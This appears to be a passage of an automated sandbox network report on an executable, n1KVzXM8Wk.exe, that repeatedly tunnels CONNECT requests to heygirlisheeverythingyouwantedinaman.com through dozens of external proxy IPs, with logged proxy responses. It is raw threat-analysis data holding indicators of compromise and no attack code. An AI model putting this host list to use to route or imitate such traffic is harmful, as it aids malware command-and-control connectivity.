                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2005192.168.2.45385754.38.179.203350326812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.300717115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.334593058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.444173098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2006192.168.2.45550443.153.81.604436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.305588007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2007192.168.2.45550941.86.252.914436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.305598021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2008192.168.2.455262195.90.216.7510806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.305651903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2009192.168.2.455304142.54.228.19341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.305696964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2010192.168.2.453913180.183.134.880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.426429033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.475045919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.485193968 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2011192.168.2.45395945.11.95.16552196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.426723957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2012192.168.2.455443161.189.203.2980816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.426834106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.752114058 CET208INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:34 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: Servlet/2.4
                                                                                                      Server: Apache/1.3.28 (SolutionIP) mod_perl/1.28 mod_ssl/2.8.15 OpenSSL/0.9.7b
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:37.855093956 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-3</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Feb 23, 2024 09:45:37.868695021 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-3</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2013192.168.2.45491824.106.221.230532816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.429367065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.030798912 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2014192.168.2.45547545.179.231.21056786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.430387974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2015192.168.2.455482193.239.58.9280816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.445058107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2016192.168.2.454050187.251.222.6980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.445913076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.961505890 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2017192.168.2.45549151.75.42.12980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.470155954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.094989061 CET39INHTTP/1.1 200 Connection established
                                                                                                      Feb 23, 2024 09:45:41.823044062 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2018192.168.2.455472218.252.244.126806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.470155954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.777309895 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:12 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2019192.168.2.455289144.91.115.113487806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.470276117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.599414110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.709880114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2020192.168.2.455266183.56.243.20910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.470374107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2021192.168.2.454038185.23.118.103542446812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.470416069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.475171089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569266081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2022192.168.2.455514104.21.64.208806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.470484018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.564229965 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:34 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2023192.168.2.45528127.65.30.3710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.807533026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2024192.168.2.453976132.148.129.254410266812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.807611942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.858810902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.944168091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2025192.168.2.453989200.39.154.19996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.896637917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.974962950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.975287914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2026192.168.2.454950170.79.181.18856786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.938884974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2027192.168.2.455507200.41.148.2120006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.953774929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2028192.168.2.455478124.160.118.18380806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.973295927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.382062912 CET323INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.8.1
                                                                                                      Date: Fri, 23 Feb 2024 21:06:38 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 172
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2029192.168.2.455245113.204.4.142108006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:34.986450911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2030192.168.2.454961107.180.90.88631006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.009179115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.037667990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.046408892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:47.053355932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2031192.168.2.455277202.57.25.9431276812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.009660006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.037672043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.878556013 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2032192.168.2.45541747.91.65.2331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.024409056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.274797916 CET38INHTTP/1.1 200 OK
                                                                                                      content-length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2033192.168.2.45508067.201.33.10252836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.056844950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2034192.168.2.455510223.19.111.185806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.072210073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.769330978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.795460939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.636625051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.443880081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.115528107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.787408113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:57.131979942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:06.845125914 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:35 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2035192.168.2.45551347.242.234.237806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.102686882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2036192.168.2.454062128.199.221.9180046812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.102802038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.881376982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.865823030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.865842104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2037192.168.2.4553785.133.16.17180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.250433922 CET131INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.
                                                                                                      Feb 23, 2024 09:45:36.748838902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
